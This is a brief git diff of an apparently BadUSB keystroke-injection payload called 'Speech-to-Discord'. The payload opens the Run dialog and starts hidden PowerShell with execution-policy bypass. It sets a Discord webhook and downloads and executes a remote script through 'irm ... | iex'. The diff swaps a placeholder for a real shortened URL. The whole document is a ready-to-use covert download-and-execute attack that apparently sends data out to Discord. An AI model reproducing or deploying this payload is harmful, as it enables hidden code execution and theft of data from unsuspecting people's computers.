diff --git a/Speech-to-Discord/Speech-to-Discord.txt b/Speech-to-Discord/Speech-to-Discord.txt index 52946af..6496718 100644 --- a/Speech-to-Discord/Speech-to-Discord.txt +++ b/Speech-to-Discord/Speech-to-Discord.txt @@ -12,7 +12,7 @@ REM open powershell (remove "-W H" to show the window) DELAY 1000 GUI r DELAY 750 -STRING powershell -NoP -Ep Bypass -W H -C $dc = 'YOUR_WEBHOOK_HERE' ; irm URL | iex +STRING powershell -NoP -Ep Bypass -W H -C $dc = 'YOUR_WEBHOOK_HERE' ; irm is.gd/bwspeechdc | iex ENTER